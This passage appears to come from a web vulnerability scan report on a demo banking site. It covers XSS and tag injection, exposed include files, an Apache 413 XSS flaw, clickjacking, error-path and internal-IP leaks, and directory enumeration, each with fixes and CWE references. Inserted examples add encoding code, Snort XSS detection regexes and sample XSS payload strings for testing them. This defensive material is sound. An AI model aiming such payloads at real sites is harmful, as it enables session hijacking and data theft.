client is immediately included via server-side scripts in a dynamically generated web page. Via some social engineering, an
attacker can trick a victim, such as through a malicious link or "rigged" form, to submit information which will be altered to
include attack code and then sent to the legitimate server. The injected code is then reflected back to the user's browser
which executes it because it came from a trusted server. The implication of each kind of attack is the same.
The main problems associated with successful HTML tag injection & Cross-Site Scripting attacks are:
Account hijacking - An attacker can hijack the user's session before the session cookie expires and take actions with the
privileges of the user who accessed the URL, such as issuing database queries and viewing the results.
Malicious script execution - Users can unknowingly execute JavaScript, VBScript, ActiveX, HTML, or even Flash content
that has been inserted into a dynamically generated page by an attacker.
Worm propagation - With Ajax applications, XSS can propagate somewhat like a virus. The XSS payload can
autonomously inject itself into pages, and easily re-inject the same host with more XSS, all of which can be done with no
hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user.
Information theft - Via redirection and fake sites, attackers can connect users to a malicious server of the attacker's
choice and capture any information entered by the user.
Denial of Service - Often by utilizing malformed display requests on sites that contain a Cross-Site Scripting vulnerability,
attackers can cause a denial of service condition by causing the host site to query itself repeatedly.
Browser Redirection - On certain types of sites that use frames, a user can be made to think that he is in fact on the
original site when he has been redirected to a malicious one, since the URL in the browser's address bar will remain the
same. This is because the entire page isn't being redirected, just the frame in which the JavaScript is being executed.
Manipulation of user settings - Attackers can change user settings for nefarious purposes.
For more detailed information on Cross-Site Scripting attacks, see the HP Cross-Site Scripting whitepaper.

Fix
For Development:
HTML Tag Injection attacks can be avoided by carefully validating all input, and properly encoding all output. When validating
user input, verify that it matches the strictest definition of valid input possible. For example, if a certain parameter is supposed
to be a number, attempt to convert it to a numeric data type in your programming language.
PHP: intval("0".$_GET['q']);
ASP.NET: int.TryParse(Request.QueryString["q"], out val);
The same applies to date and time values, or anything that can be converted to a stricter type before being used. When
accepting other types of text input, make sure the value matches either a list of acceptable values (white-listing), or a strict
regular expression. If at any point the value appears invalid, do not accept it. Also, do not attempt to return the value to the
user in an error message.
Most server side scripting languages provide built-in methods to convert the value of the input variable into correct, non-interpretable HTML. These should be used to sanitize all input before it is displayed to the client.
PHP: string htmlspecialchars (string string [, int quote_style])
ASP.NET: Server.HTMLEncode (strHTML String)
When reflecting values into JavaScript or another format, make sure to use a type of encoding that is appropriate. Encoding
data for HTML is not sufficient when it is reflected inside of a script or style sheet. For example, when reflecting data in a
JavaScript string, make sure to encode all non-alphanumeric characters using hex (\xHH) encoding.
If you have JavaScript on your page that accesses unsafe information (like location.href) and writes it to the page (either with
document.write, or by modifying a DOM element), make sure you encode data for HTML before writing it to the page.
JavaScript does not have a built-in function to do this, but many frameworks do. If you are lacking an available function,
something like the following will handle most cases:
s = s.replace(/&/g,'&amp;').replace(/"/g,'&quot;').replace(/</g,'&lt;').replace(/>/g,'&gt;').replace(/'/g,'&#39;')
Every replace needs the g flag; without it only the first occurrence of each character is encoded, so a second quote or
angle bracket passes through untouched. &#39; is used for the apostrophe because &apos; is not defined in HTML 4.
Ensure that you are always using the right approach at the right time. Validating user input should be done as soon as it is
received. Encoding data for display should be done immediately before displaying it.
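An added example, not from the report, that implements both halves of the guidance above in Python: strict numeric validation in the spirit of the PHP and ASP.NET one-liners, HTML entity encoding for element text, and \xHH (with \uHHHH for characters beyond Latin-1) encoding for data reflected into a JavaScript string literal. The function names and the small page template are the example's own.

```python
# Added example (not from the report): the two halves of the fix, strict input typing and
# context-specific output encoding, for a reflected searchTerm-style parameter.
# Function names and the page template are the example's own.
import html
import re


def to_int(raw, default=0):
    """Strict numeric validation: only an optional sign and up to ten digits are accepted,
    so '42abc', '1e3' or '<script>' never reach the query."""
    if raw is None or not re.fullmatch(r"-?\d{1,10}", raw.strip()):
        return default
    return int(raw)


def html_encode(value):
    """For element text and quoted attribute values: & < > " ' become entities."""
    return html.escape(value, quote=True)


def js_string_encode(value):
    """For data placed inside a quoted JavaScript string literal. Every non-alphanumeric
    character becomes \\xHH (Latin-1) or \\uHHHH (UTF-16 units beyond that), so quotes,
    backslashes, newlines and '</script>' cannot terminate the literal or the script."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02X" % ord(ch))
        else:
            units = ch.encode("utf-16-be")          # surrogate pairs for astral code points
            for i in range(0, len(units), 2):
                out.append("\\u%04X" % int.from_bytes(units[i:i + 2], "big"))
    return "".join(out)


def render_search_page(term):
    """Reflect the same value into HTML body text and into a JS string, each through the
    encoder for its own context; HTML encoding alone would leave the JS context unsafe."""
    return (
        "<h2>Results for: %s</h2>\n"
        '<script>var term = "%s";</script>' % (html_encode(term), js_string_encode(term))
    )


if __name__ == "__main__":
    payload = '</script><img src=x onerror=alert(1)>'
    print(render_search_page(payload))
    print(to_int("42"), to_int("42abc"), to_int("<script>"))
```

Note the ordering the text asks for: to_int runs at the point the request is read, while html_encode and js_string_encode run inside the render function, immediately before the value is written out.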
The signature below can be added as a new Snort rule as follows:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII HTML Tag Injection attempt";
flow:to_server,established; pcre:"/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/i"; classtype:web-application-attack;
sid:9000; rev:5;)
Paranoid regex for XSS attacks:
/((\%3C)|<)[^\n]+((\%3E)|>)/i
This signature simply looks for the opening angle bracket of an HTML tag, or its URL-encoded equivalent, followed by one or
more characters other than a newline, and then the closing bracket or its encoded equivalent. It may produce some false
positives depending upon how your web application and web server are structured, but it will catch anything in the raw
request that even remotely resembles an HTML tag. Note that both rules inspect the URI as sent: a payload that is
URL-encoded twice, or an injection that needs no angle brackets (for example breaking out of an existing attribute into an
event handler), is not matched unless the request is normalised first.
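An added example (not from the report) that runs both signatures above, with their alternation operators restored, over constructed request lines. It shows two properties worth knowing before deploying them: the first rule only matches bare tags such as <script>, so a tag carrying attributes is caught only by the paranoid rule, and both operate on the URI as sent, so a doubly URL-encoded payload fires only after one round of decoding.

```python
# Added example (not from the report): the report's two signatures run over constructed
# request lines, with and without a single round of URL decoding.
import re
from urllib.parse import unquote

TAG_INJECTION = re.compile(r"((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)", re.I)
PARANOID = re.compile(r"((%3C)|<)[^\n]+((%3E)|>)", re.I)


def inspect_request_line(line, decode_once=False):
    """Names of the signatures that fire on one request line; decode_once applies a single
    URL-decode first, which is what a WAF or an IDS HTTP preprocessor normally does for you."""
    subject = unquote(line) if decode_once else line
    hits = []
    if TAG_INJECTION.search(subject):
        hits.append("tag-injection")
    if PARANOID.search(subject):
        hits.append("paranoid")
    return hits


def inspect_log(lines, decode_once=False):
    """(line, hits) for every line that triggers at least one signature."""
    results = []
    for line in lines:
        hits = inspect_request_line(line, decode_once)
        if hits:
            results.append((line, hits))
    return results


SAMPLE_REQUESTS = [  # constructed request lines
    "GET /search.html?searchTerm=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1",
    "GET /search.html?searchTerm=<img src=x onerror=alert(1)> HTTP/1.1",
    "GET /search.html?searchTerm=banking HTTP/1.1",
    "GET /search.html?searchTerm=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1",
    "GET /search.html?searchTerm=1%3C2 HTTP/1.1",
]

if __name__ == "__main__":
    for decode in (False, True):
        print("decode_once =", decode)
        for line, hits in inspect_log(SAMPLE_REQUESTS, decode):
            print("  ", hits, line)
```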
For QA:
Fixes for HTML Injection defects will ultimately require code based fixes.

Reference
OWASP Cross-Site Scripting Information:
http://www.owasp.org/index.php/Cross_Site_Scripting
XSRF on OWASP:
http://www.owasp.org/index.php/XSRF
XSRF on Wikipedia:
http://en.wikipedia.org/wiki/Cross-site_request_forgery
Sans:
http://isc.sans.org/diary.php?storyid=1750

Classifications

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
http://cwe.mitre.org/data/definitions/79.html
CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
http://cwe.mitre.org/data/definitions/80.html
CWE-116: Improper Encoding or Escaping of Output
http://cwe.mitre.org/data/definitions/116.html
CWE-352: Cross-Site Request Forgery (CSRF)
http://cwe.mitre.org/data/definitions/352.html
CWE-811: OWASP Top Ten 2010 Category A2 - Cross-Site Scripting (XSS)
http://cwe.mitre.org/data/definitions/811.html
Kingdom: Input Validation and Representation
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html


Web Server Misconfiguration: Unprotected File ( 10365 )


Summary
An application include file was found. This results in a possible information disclosure vulnerability, exposing internal
application workings to an attacker who can then potentially leverage that information to exploit the application.
Recommendations include storing include files in a location other than the webroot.

Execution
Open a web browser and navigate to http://zero.webappsecurity.com:80/include/common.inc.

Implication
An attacker could view web application source code. Web application source code often contains database usernames,
passwords and connection strings and locations of sensitive files. It also reveals the detailed mechanics and design of the web
application's logic, which can be used to develop other attacks.

Fix
For Development:
Keep include files outside of the web root. Scripts can still be used to access and include them by using either relative or
absolute paths. This will prevent potential attackers from having direct access to include files from the web.
For Security Operations:
Take measures to prevent unauthorized access to important files or directories.
For QA:
From a security perspective, it is important to test the web application not only as a normal user, but also as a malicious one.
Make sure that the webroot is free from files that could be used to gather information about the application that could be
utilized in conducting more damaging attacks.

Reference

Classifications

CWE-94: Failure to Control Generation of Code ('Code Injection')


http://cwe.mitre.org/data/definitions/94.html
CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Insecure Deployment: Unpatched Application ( 10717 )


Summary
Apache versions 2.0.46, 2.0.51, 2.0.55, 2.0.59, 2.2.3, and 2.2.4 are known to contain a Cross-Site Scripting vulnerability.
Cross-Site Scripting occurs when dynamically generated web pages display user input, such as login information, that is not
properly validated, allowing an attacker to embed malicious scripts into the generated page and then execute the script on the
machine of any user that views the site. If successful, Cross-Site Scripting vulnerabilities can be exploited to manipulate or
steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute
malicious code on end user systems. Apache 2.X reflects the HTTP method name within the '413 Request Entity Too Large'
error page which might allow an attacker to embed malicious script into the page via the HTTP method value.
Recommendations include updating to a fixed version of the application.

Execution
Click http://zero.webappsecurity.com:80/ to verify the vulnerability in a web browser.

Implication
Cross-Site Scripting happens when user input from a web client is immediately included via server-side scripts in a dynamically
generated web page. Via social engineering, an attacker can trick a victim, such as through a malicious link or "rigged" form,
to submit information which will be altered to include attack code and then sent to the legitimate server. The injected code is
then reflected back to the user's browser which executes it because it came from a trusted server.
The main problems associated with successful Cross-Site Scripting attacks are:

Account hijacking
Javascript-based worm propagation
Information theft
Denial of service
Browser redirection
Manipulation of user settings

For more detailed information on Cross-Site Scripting attacks, see the HP Application Security Center Cross-Site Scripting
whitepaper.

Fix
Disable Apache's default 413 error pages by adding an 'ErrorDocument 413' statement to the Apache config file.

Reference
Vendor:
http://www.apache.org/
Advisory:
http://secunia.com/advisories/27906/
CVE:
CVE-2007-6203
HP:
HP Application Security Center Cross-Site Scripting Whitepaper
CERT:
CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
OWASP:
Cross-Site Scripting

Classifications

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
http://cwe.mitre.org/data/definitions/79.html
CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
http://cwe.mitre.org/data/definitions/80.html
CWE-116: Improper Encoding or Escaping of Output
http://cwe.mitre.org/data/definitions/116.html
CWE-811: OWASP Top Ten 2010 Category A2 - Cross-Site Scripting (XSS)
http://cwe.mitre.org/data/definitions/811.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Cross-Frame Scripting ( 11294 )


Summary
A Cross-Frame Scripting (XFS) vulnerability can allow an attacker to load the vulnerable application inside an HTML iframe tag
on a malicious page. The attacker could use this weakness to devise a Clickjacking attack to conduct phishing, frame sniffing,
social engineering or Cross-Site Request Forgery attacks.
Clickjacking
The goal of a Clickjacking attack is to deceive the victim user into interacting with UI elements of the attacker's choice on the
target web site without her knowledge, and in turn executing privileged functionality on the victim's behalf. To achieve this
goal, the attacker must exploit the XFS vulnerability to load the attack target inside an iframe tag, hide it using Cascading
Style Sheets (CSS) and overlay the phishing content on the malicious page. By placing the UI elements on the phishing page
so that they overlap with those on the targeted page, the attacker ensures that the victim unknowingly interacts with
UI elements on the target page that are not visible to the victim.
WebInspect has detected a response that contains one or more forms accepting user input but is missing XFS protection.

This response is not protected by a valid X-Frame-Options header. Furthermore, an effective frame-busting technique was not
observed while loading this page inside a frame.

Execution
Create a test page containing an HTML <iframe> tag whose src attribute is set to http://zero.webappsecurity.com:80/.
Successful framing of the target page indicates the application's susceptibility to XFS.
Note that WebInspect will report only one instance of this check across each host within the scope of the scan. The other
visible pages on the site may, however, be vulnerable to XFS as well and hence should be protected against it with an
appropriate fix.

Implication
A Cross-Frame Scripting weakness could allow an attacker to embed the vulnerable application inside an iframe. Exploitation
of this weakness could result in:
Hijacking of user events such as keystrokes
Theft of sensitive information
Execution of privileged functionality through combination with Cross-Site Request Forgery attacks

Fix
Browser vendors have introduced and adopted a policy-based mitigation technique using the X-Frame-Options header.
Developers can use this header to instruct the browser about appropriate actions to perform if their site is included inside an
iframe. Developers must set the X-Frame-Options header to one of the following permitted values:
DENY
Deny all attempts to frame the page
SAMEORIGIN
The page can be framed by another page only if it belongs to the same origin as the page being framed
ALLOW-FROM origin
Developers can specify a list of trusted origins in the origin attribute. Only pages on origin are permitted to load this page
inside an iframe
Developers must also use client-side frame busting JavaScript as a protection against XFS. This will enable users of older
browsers that do not support the X-Frame-Options header to also be protected from clickjacking attacks.

Reference
HP 2012 Cyber Security Report
The X-Frame-Options header - a failure to launch
Server Configuration:
IIS
Apache, nginx
Specification:
X-Frame-Options IETF Draft
OWASP:
Clickjacking
Frame Busting:
Busting Frame Busting: A Study of Clickjacking Vulnerabilities on Popular Sites
OWASP: Busting Frame Busting

Classifications

CWE-352: Cross-Site Request Forgery (CSRF)


http://cwe.mitre.org/data/definitions/352.html
Kingdom: Security Features
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Poor Error Handling: Unhandled Exception ( 810 )


Summary
A minor vulnerability has been discovered within your web application due to the presence of a fully qualified path name
to the root of your system. This most often occurs in context of an error being produced by the web application. Fully qualified
server path names allow an attacker to know the file system structure of the web server, which is a baseline for many other
types of attacks to be successful. Recommendations include adopting a consistent error handling scheme and mechanism that
prevents fully qualified path names from being displayed.

Execution
To verify the issue, click the 'HTTP Response' button on the properties view and review the highlighted areas to determine the
Unix path found.

Fix
For Development:
Don't display fully qualified pathnames as part of error or informational messages. At the least, fully qualified pathnames can
provide an attacker with important information about the architecture of the web application.
For Security Operations:
The following recommendations will help to ensure that a potential attacker is not deriving valuable information from any error
message that is presented.

Uniform Error Codes: Ensure that you are not inadvertently supplying information to an attacker via the use of
inconsistent or "conflicting" error messages. For instance, don't reveal unintended information by utilizing error messages
such as Access Denied, which will also let an attacker know that the file he seeks actually exists. Have consistent
terminology for files and folders that do exist, do not exist, and which have read access denied.

Informational Error Messages: Ensure that error messages do not reveal too much information. Complete or partial
paths, variable and file names, row and column names in tables, and specific database errors should never be revealed
to the end user. Remember, an attacker will gather as much information as possible, and then add pieces of seemingly
innocuous information together to craft a method of attack.

Proper Error Handling: Utilize generic error pages and error handling logic to inform end users of potential problems.
Do not provide system information or other data that could be utilized by an attacker when orchestrating an attack.
For QA:

In reality, simple testing can usually determine how your web application will react to different input errors. More expansive
testing must be conducted to cause internal errors to gauge the reaction of the site.

The best course of action for QA associates to take is to ensure that the error handling scheme is consistent. Do you receive a
different type of error for a file that does not exist as opposed to a file that does? Are phrases like "Permission Denied" utilized
which could reveal the existence of a file to an attacker? It is often a seemingly innocuous piece of information that provides
an attacker with the means to discover something else which he can then utilize when conducting an attack.

Reference

Classifications

CWE-200: Information Exposure


http://cwe.mitre.org/data/definitions/200.html
Kingdom: Errors
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected File ( 2291 )


Summary
System Environment variables log files contain information about the nature of your web application, and would allow an
attacker to gain insightful information about the web system setup. Recommendations include removing this file from the
affected system.

Implication
A fundamental part of any successful attack is reconnaissance and information gathering. The primary danger from
exploitation of this vulnerability is that an attacker will be able to utilize the information in launching a more serious attack. It
is very simple to check for its existence, and a file most definitely on the short list of things for which a potential attacker
would look.

Fix
For Security Operations:


Remove this file from the system in question. One of the most important aspects of web application security is to restrict
access to important files or directories only to those individuals who actually need to access them. Ensure that the private
architectural structure of your web application is not exposed to anyone who wishes to view it as even seemingly innocuous
directories can provide important information to a potential attacker.
For QA:
Notify your Security or Network Operations team of this issue.
For Development:
Notify your Security or Network Operations team of this issue.

Reference

Classifications

CWE-200: Information Exposure


http://cwe.mitre.org/data/definitions/200.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

System Information Leak: Internal IP ( 3508 )


Summary
A string matching an internal/reserved IPv4 or IPv6 address range was discovered. This may disclose information about the IP
addressing scheme of the internal network and can be valuable to attackers. Internal IPv4/IPv6 ranges are:
10.x.x.x
172.16.x.x through 172.31.x.x
192.168.x.x
fd00::x
If not a part of technical documentation, recommendations include removing the string from the production server.

Fix
This issue can appear for several reasons. The most common is that the application or webserver error message discloses the
IP address. This can be solved by determining where to turn off detailed error messages in the application or webserver.
Another common reason is due to a comment located in the source of the webpage. This can easily be removed from the
source of the page.

Reference

Classifications

CWE-200: Information Exposure


http://cwe.mitre.org/data/definitions/200.html
Kingdom: Encapsulation
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html
Web Server Misconfiguration: Unprotected Directory ( 10210 )


Summary
Administrative directories were discovered within your web application during a Directory Enumeration scan. Risks associated
with an attacker discovering an administrative directory on your application server typically include the potential for the
attacker to use the administrative applications to affect the operations of the web site. Recommendations include restricting
access to important directories or files by adopting a "need to know" requirement for both the document and server root, and
turning off features such as Automatic Directory Listings that provide information that could be utilized by an attacker when
formulating or conducting an attack.

Implication
The primary danger from an attacker finding a publicly available directory on your web application server depends on what
type of directory it is, and what files it contains. Administrative directories typically contain applications capable of changing
the configuration of the running software; an attacker who gains access to an administrative application can drastically affect
the operation of the web site.

Fix
For Security Operations:
You should evaluate the production requirements for the found directory. If the directory is not required for production
operation, then the directory and its contents should be removed or restricted by a server access control mechanism. More
information about implementing access control schemes can be found in the References. Automatic directory indexing should
also be disabled, if applicable.
For Development:
This problem will be resolved by the web application server administrator. In general, do not rely on 'hidden' directories within
the web root that can contain sensitive resources or web applications. Assume an attacker knows about the existence of all
directories and files on your web site, and protect them with proper access controls.
For QA:
This problem will be resolved by the web application server administrator.

Reference
Implementing Basic Authentication in IIS
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/abbca505-6f63-4267-aac11ea89d861eb4.mspx
Implementing Basic Authentication in Apache
http://httpd.apache.org/docs/howto/auth.html#intro

Classifications

CWE-548: Information Leak Through Directory Listing


http://cwe.mitre.org/data/definitions/548.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected Directory ( 10211 )

Summary
Directory Enumeration vulnerabilities were discovered within your web application. Risks associated with an attacker
discovering a directory on your application server depend upon what type of directory is discovered, and what types of files
are contained within it. The primary threat, other than accessing files containing sensitive information, is that an attacker can
utilize the information discovered in that directory to perform other types of attacks. Recommendations include restricting
access to important directories or files by adopting a "need to know" requirement for both the document and server root, and
turning off features such as Automatic Directory Listings that provide information that could be utilized by an attacker when
formulating or conducting an attack.

Implication
The primary danger from an attacker finding a publicly available directory on your web application server depends on what
type of directory it is, and what files it contains.

Fix
For Security Operations:
You should evaluate the production requirements for the found directory. If the directory is not required for production
operation, then the directory and its contents should be removed or restricted by a server access control mechanism. More
information about implementing access control schemes can be found in the References. Automatic directory indexing should
also be disabled, if applicable.
For Development:
This problem will be resolved by the web application server administrator. In general, do not rely on 'hidden' directories within
the web root that can contain sensitive resources or web applications. Assume an attacker knows about the existence of all
directories and files on your web site, and protect them with proper access controls.
For QA:
This problem will be resolved by the web application server administrator.

Reference
Implementing Basic Authentication in IIS
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/abbca505-6f63-4267-aac11ea89d861eb4.mspx
Implementing Basic Authentication in Apache
http://httpd.apache.org/docs/howto/auth.html#intro

Classifications

CWE-548: Information Leak Through Directory Listing


http://cwe.mitre.org/data/definitions/548.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected Directory ( 10212 )


Summary
Directory Enumeration vulnerabilities were discovered within your web application. Risks associated with an attacker
discovering a directory on your application server depend upon what type of directory is discovered, and what types of files
are contained within it. The primary threat, other than accessing files containing sensitive information, is that an attacker can
utilize the information discovered in that directory to perform other types of attacks. Recommendations include restricting
access to important directories or files by adopting a "need to know" requirement for both the document and server root, and
turning off features such as Automatic Directory Listings that provide information that could be utilized by an attacker when
formulating or conducting an attack.

Fix
For Security Operations:
You should evaluate the production requirements for the found directory. If the directory is not required for production
operation, then the directory and its contents should be removed or restricted by a server access control mechanism. More
information about implementing access control schemes can be found in the References. Automatic directory indexing should
also be disabled, if applicable.
For Development:
This problem will be resolved by the web application server administrator. In general, do not rely on 'hidden' directories within
the web root that can contain sensitive resources or web applications. Assume an attacker knows about the existence of all
directories and files on your web site, and protect them with proper access controls.
For QA:
This problem will be resolved by the web application server administrator.

Reference
Implementing Basic Authentication in IIS
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/abbca505-6f63-4267-aac11ea89d861eb4.mspx
Implementing Basic Authentication in Apache
http://httpd.apache.org/docs/howto/auth.html#intro

Classifications

CWE-548: Information Leak Through Directory Listing


http://cwe.mitre.org/data/definitions/548.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected Directory ( 10214 )


Summary
Directory Enumeration vulnerabilities were discovered within your web application. Risks associated with an attacker
discovering a directory on your application server depend upon what type of directory is discovered, and what types of files
are contained within it. The primary threat, other than accessing files containing sensitive information, is that an attacker can
utilize the information discovered in that directory to perform other types of attacks. Recommendations include restricting
access to important directories or files by adopting a "need to know" requirement for both the document and server root, and
turning off features such as Automatic Directory Listings that provide information that could be utilized by an attacker when
formulating or conducting an attack.

Fix
For Security Operations:
You should evaluate the production requirements for the found directory. If the directory is not required for production
operation, then the directory and its contents should be removed or restricted by a server access control mechanism. More
information about implementing access control schemes can be found in the References. Automatic directory indexing should
also be disabled, if applicable.
For Development:
This problem will be resolved by the web application server administrator. In general, do not rely on 'hidden' directories within
the web root that can contain sensitive resources or web applications. Assume an attacker knows about the existence of all
directories and files on your web site, and protect them with proper access controls.
For QA:
This problem will be resolved by the web application server administrator.
Reference
Implementing Basic Authentication in IIS
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/abbca505-6f63-4267-aac11ea89d861eb4.mspx
Implementing Basic Authentication in Apache
http://httpd.apache.org/docs/howto/auth.html#intro

Classifications

CWE-548: Information Leak Through Directory Listing


http://cwe.mitre.org/data/definitions/548.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected Directory ( 10216 )


Summary
Data-related directories were discovered within your web application during a Directory Enumeration. Risks associated with an
attacker discovering a directory on your application server depend upon what type of directory is discovered, and what types
of files are contained within it. The primary threat, other than accessing files containing sensitive information, is that an
attacker can utilize the information discovered in that directory to perform other types of attacks. Recommendations include
restricting access to important directories or files by adopting a "need to know" requirement for both the document and server
root, and turning off features such as Automatic Directory Listings that provide information that could be utilized by an
attacker when formulating or conducting an attack.

Fix
For Security Operations:
You should evaluate the production requirements for the found directory. If the directory is not required for production
operation, then the directory and its contents should be removed or restricted by a server access control mechanism. More
information about implementing access control schemes can be found in the References. Automatic directory indexing should
also be disabled, if applicable.
For Development:
This problem will be resolved by the web application server administrator. In general, do not rely on 'hidden' directories within
the web root that can contain sensitive resources or web applications. Assume an attacker knows about the existence of all
directories and files on your web site, and protect them with proper access controls.
For QA:
This problem will be resolved by the web application server administrator.

Reference
Implementing Basic Authentication in IIS
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/abbca505-6f63-4267-aac11ea89d861eb4.mspx
Implementing Basic Authentication in Apache
http://httpd.apache.org/docs/howto/auth.html#intro

Classifications

CWE-548: Information Leak Through Directory Listing


http://cwe.mitre.org/data/definitions/548.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected Directory ( 10217 )


Summary
Development-related directories were discovered within your web application during a Directory Enumeration scan. Risks
associated with an attacker discovering a directory on your application server depend upon what type of directory is
discovered, and what types of files are contained within it. The primary threat, other than accessing files containing sensitive
information, is that an attacker can utilize the information discovered in that directory to perform other types of attacks.
Recommendations include removing any source code directories and repositories from the production server, disabling the use
of remote repositories, and ensuring that the latest patches and version updates have been performed on the version control
system being used. Additionally, restrict access to important directories or files by adopting a "need to know" requirement for
both the document and server root, and turning off features such as Automatic Directory Listings that provide information that
could be utilized by an attacker when formulating or conducting an attack.

Execution
Browse to http://zero.webappsecurity.com:80/testing/ and inspect the content. The response should return with HTTP status
code 200 and should not match the target site's file-not-found response.

Implication
An attacker may use the internal information obtained from the source code files to craft a precise attack against the web
application. Such attacks can include, but are not limited to, SQL injection, remote file system access, malware injection and
database manipulation.

Fix
For Security Operations:
You should evaluate the production requirements for the found directory. If the directory is not required for production
operation, then the directory and its contents should be removed or restricted by a server access control mechanism. More
information about implementing access control schemes can be found in the References. Automatic directory indexing should
also be disabled, if applicable.
For Development:
This problem will be resolved by the web application server administrator. In general, remove all source code repositories and
files from the production server and do not rely on 'hidden' directories within the web root that can contain sensitive resources
or web applications. Assume an attacker knows about the existence of all directories and files on your web site, and protect
them with proper access controls.
For QA:
This problem will be resolved by the web application server administrator.

Reference
IIS Authentication
Implementing Basic Authentication in Apache
http://httpd.apache.org/docs/howto/auth.html#intro
SVN
Serving websites from SVN checkout considered harmful
Subversion or CVS metadata exposure

Classifications

CWE-548: Information Leak Through Directory Listing


http://cwe.mitre.org/data/definitions/548.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected Directory ( 10218 )


Summary
Directory Enumeration vulnerabilities were discovered within your web application. Risks associated with an attacker
discovering a directory on your application server depend upon what type of directory is discovered, and what types of files
are contained within it. The primary threat, other than accessing files containing sensitive information, is that an attacker can
utilize the information discovered in that directory to perform other types of attacks. Recommendations include restricting
access to important directories or files by adopting a "need to know" requirement for both the document and server root, and
turning off features such as Automatic Directory Listings that provide information that could be utilized by an attacker when
formulating or conducting an attack.

Fix
For Security Operations:
You should evaluate the production requirements for the found directory. If the directory is not required for production
operation, then the directory and its contents should be removed or restricted by a server access control mechanism. More
information about implementing access control schemes can be found in the References. Automatic directory indexing should
also be disabled, if applicable.
For Development:
This problem will be resolved by the web application server administrator. In general, do not rely on 'hidden' directories within
the web root that can contain sensitive resources or web applications. Assume an attacker knows about the existence of all
directories and files on your web site, and protect them with proper access controls.
For QA:
This problem will be resolved by the web application server administrator.

Reference
Implementing Basic Authentication in IIS
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/abbca505-6f63-4267-aac11ea89d861eb4.mspx
Implementing Basic Authentication in Apache
http://httpd.apache.org/docs/howto/auth.html#intro

Classifications

CWE-548: Information Leak Through Directory Listing


http://cwe.mitre.org/data/definitions/548.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected Directory ( 10229 )


Summary
Logfile and/or statistic directories were discovered within your web application during a Directory Enumeration scan. Risks
associated with an attacker discovering a directory on your application server depend upon what type of directory is
discovered, and what types of files are contained within it. The primary threat, other than accessing files containing sensitive
information, is that an attacker can utilize the information discovered in that directory to perform other types of attacks.
Recommendations include restricting access to important directories or files by adopting a "need to know" requirement for
both the document and server root, and turning off features such as Automatic Directory Listings that provide information that
could be utilized by an attacker when formulating or conducting an attack.

Fix
For Security Operations:
You should evaluate the production requirements for the found directory. If the directory is not required for production
operation, then the directory and its contents should be removed or restricted by a server access control mechanism. More
information about implementing access control schemes can be found in the References. Automatic directory indexing should
also be disabled, if applicable.
For Development:
This problem will be resolved by the web application server administrator. In general, do not rely on 'hidden' directories within
the web root that can contain sensitive resources or web applications. Assume an attacker knows about the existence of all
directories and files on your web site, and protect them with proper access controls.
For QA:
This problem will be resolved by the web application server administrator.

Reference
Implementing Basic Authentication in IIS
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/abbca505-6f63-4267-aac11ea89d861eb4.mspx
Implementing Basic Authentication in Apache
http://httpd.apache.org/docs/howto/auth.html#intro

Classifications

CWE-548: Information Leak Through Directory Listing


http://cwe.mitre.org/data/definitions/548.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected Directory ( 10233 )


Summary
Directories that may be restricted to only certain users were discovered within your web application during a Directory
Enumeration scan. Risks associated with an attacker discovering a directory on your application server depend upon what type
of directory is discovered, and what types of files are contained within it. The primary threat, other than accessing files
containing sensitive information, is that an attacker can utilize the information discovered in that directory to perform other
types of attacks. Recommendations include restricting access to important directories or files by adopting a "need to know"
requirement for both the document and server root, and turning off features such as Automatic Directory Listings that provide
information that could be utilized by an attacker when formulating or conducting an attack.

Fix
For Security Operations:
You should evaluate the production requirements for the found directory. If the directory is not required for production
